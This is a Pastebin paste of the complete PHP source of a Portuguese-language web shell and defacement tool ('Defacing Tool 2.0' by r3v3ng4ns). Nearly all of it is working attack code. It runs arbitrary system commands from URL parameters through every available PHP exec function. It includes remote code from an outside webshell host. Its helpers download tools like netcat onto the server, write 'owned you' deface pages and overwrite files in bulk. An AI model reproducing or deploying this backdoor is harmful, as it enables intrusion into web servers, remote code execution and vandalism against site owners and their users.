Advertisement
FlyFar

Backdoor.PHP.DefaceTool.b - Source Code

Jun 13th, 2023
699
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 15.00 KB | Cybersecurity | 0 0
  1. <!--
  2. Defacing Tool 2.0 by r3v3ng4ns
  3. revengans@gmail.com
  4. se for modificar o codigo, por favor, mantenha o nome de seus autores originais
  5. e por favor, mantenha a cmd priv8. se vc recebeu o codigo ou url, confiei(amos) em vc...
  6. -->
  7. <?php
  8. @closelog();
  9. @error_reporting(0);
  10. $vers="2.0beta priv8!";
  11. $remote_addr="http://dezu.webshells.org/";
  12. $format_addr=".dat";
  13. $cmd_addr=$remote_addr."tool20".$format_addr;
  14. $safe_addr=$remote_addr."safe20".$format_addr;
  15. $writer_addr=$remote_addr."writer20".$format_addr;
  16. $phpget_addr=$remote_addr."get20".$format_addr;
  17. $feditor_addr=$remote_addr."filed".$format_addr;
  18. $put_addr=$remote_addr."filed_put".$format_addr;
  19. $total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
  20.  
  21. if(empty($chdir)) $chdir = @$_GET['chdir'];
  22. if(empty($cmd)) $cmd = @$_GET['cmd'];
  23. if(empty($fu)) $fu = @$_GET['fu'];
  24. if(empty($list)) $list = @$_GET['list'];
  25.  
  26. if(empty($chdir) or $chdir=='') $chdir=getcwd();
  27. $cmd = stripslashes(trim($cmd));
  28.  
  29.  
  30. //CHDIR tool
  31. if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
  32.     $boom = explode(" ",$cmd,2);
  33.     $boom2 = explode(";",$boom['1'], 2);
  34.     $toDir = $boom2['0'];
  35.  
  36.     if($boom['1']=="/")$chdir="";
  37.     else if(strpos($cmd, 'chdir ..')!==false){
  38.         $cadaDir = array_reverse(explode("/",$chdir));
  39.         if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
  40.         else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
  41.         $toDir = str_replace($lastDir,"",$chdir);
  42.         if($toDir=="/")$chdir="";
  43.     }
  44.     else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
  45.     else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();
  46.  
  47.     if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
  48.     if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
  49.     else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
  50.     else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
  51.     if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
  52.     if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
  53. }
  54. if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
  55. $cmdShow = $cmd;
  56.  
  57. //To keep the changes in the url, when using the 'GET' way to send php variables
  58. if(empty($post)){
  59.     if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
  60.     if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
  61.     if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
  62. }
  63.  
  64. //INFO table (pro and normal)
  65. if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
  66. if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
  67. if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
  68. if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
  69. if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
  70. if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
  71. $safe = @ini_get($safemode);
  72. if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
  73. $pro8 = "<i>PHP </i>".phpversion();
  74. $pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
  75. $login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
  76. $ip=@gethostbyname($_SERVER['HTTP_HOST']);
  77.  
  78. //Turns the 'ls' command more usefull, showing it as it looks in the shell
  79. if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
  80. else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
  81. else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
  82. else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
  83. else if($cmd=='ls') $cmd = "ls -F";
  84.  
  85. //If there are some '//' in the cmd, its now removed
  86. if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
  87. ?>
  88. <body onload="focar();">
  89. <style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
  90. .infop{font-family: verdana; font-size: 10px; color:#000000;}
  91. .infod{font-family: verdana; font-size: 10px; color:#414978;}
  92. .algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
  93. .titulod{font:Verdana; color:#414978; font-size:20px;}</style>
  94. <script>
  95. function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
  96. function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
  97. function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
  98. function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
  99. function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
  100. function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
  101. function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
  102. function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
  103. function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
  104. function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
  105. </script>
  106. <table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
  107. <tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
  108. <font size=3>by r3v3ng4ns - revengans@gmail.com </font>
  109. </b></div></td></tr>
  110. <tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
  111. <?php
  112.  $uname = @posix_uname();
  113.  while (list($info, $value) = each ($uname)) { ?>
  114. <TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
  115. <TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
  116. <TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
  117. <TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
  118. <TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
  119. <? if($chdir!=getcwd()){?>
  120. <TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
  121. <TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
  122. </DIV></TD></TR></TABLE></td></tr>
  123. <tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
  124. <table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
  125. <td width="75"><DIV class="algod">command</DIV></td>
  126. <td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
  127. <script>
  128. function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
  129. </script>
  130. </td></tr></table><table><tr><td>
  131. <?php
  132. ob_start();
  133. if(isset($chdir)) @chdir($chdir);
  134. function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
  135. function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
  136. function shell($what){echo(shell_exec($what));}
  137. function popenn($what){
  138.     $handle=popen("$what", "r");
  139.     $out=@fread($handle, 2096);
  140.     echo $out;
  141.     @pclose($handle);
  142. }
  143. function execc($what){
  144.     exec("$what",$array_out);
  145.     $out=implode("\n",$array_out);
  146.     echo $out;
  147. }
  148. function procc($what){
  149.     //na sequencia: stdin, stdout, sterr
  150.     if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
  151.     $process = @proc_open("$what",$descpec,$pipes);
  152.     if (is_resource($process)) {
  153.         fwrite($pipes[0], "");
  154.         fclose($pipes[0]);
  155.  
  156.         while(!feof($pipes[2])) {
  157.             $erro_retorno = fgets($pipes[2], 4096);
  158.             if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
  159.         }
  160.             fclose($pipes[2]);
  161.  
  162.         while(!feof($pipes[1])) {
  163.             echo fgets($pipes[1], 4096);
  164.         }
  165.         fclose($pipes[1]);
  166.  
  167.         $ok_p_fecha = @proc_close($process);
  168.     }else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
  169. }else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
  170. }
  171.  
  172. $funE="function_exists";
  173. if($safe){$fe="safemode";$feshow=$fe;}
  174. elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
  175. elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
  176. elseif($funE('system')){$fe="system";$feshow=$fe;}
  177. elseif($funE('exec')){$fe="execc";$feshow="exec";}
  178. elseif($funE('popen')){$fe="popenn";$feshow="popen";}
  179. elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
  180. else {$fe="nofunction";$feshow=$fe;}
  181. if($fu!="0" or !empty($fu)){
  182.   if($fu==1){$fe="passthru";$feshow=$fe;}
  183.   if($fu==2){$fe="system";$feshow=$fe;}
  184.   if($fu==3){$fe="execc";$feshow="exec";}
  185.   if($fu==4){$fe="popenn";$feshow="popen";}
  186.   if($fu==5){$fe="shell";$feshow="shell_exec";}
  187.   if($fu==6){$fe="procc";$feshow="proc_open";}
  188. }
  189. $fe("$cmd 2>&1");
  190. $output=ob_get_contents();ob_end_clean();
  191. ?>
  192. <td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
  193. <option><?="using $feshow()";?>
  194. <option value="1">use passthru()
  195. <option value="2">use system()
  196. <option value="3">use exec()
  197. <option value="4">use popen()
  198. <option value="5">use shell_exec()
  199. <option value="6">use proc_open()*new
  200. <option value="0">auto detect (default)
  201. </select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
  202. <? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
  203. </tr></table></td></tr></table></form></td></tr>
  204. <tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
  205. <TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
  206. <?php
  207. echo $ch_msg;
  208. if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
  209. if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
  210. ?></TEXTAREA><BR></td></tr>
  211. <?php
  212. if($list=="1") @include($remote_addr."flist".$format_addr);
  213. ?>
  214. </table
Tags: php tool Deface
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement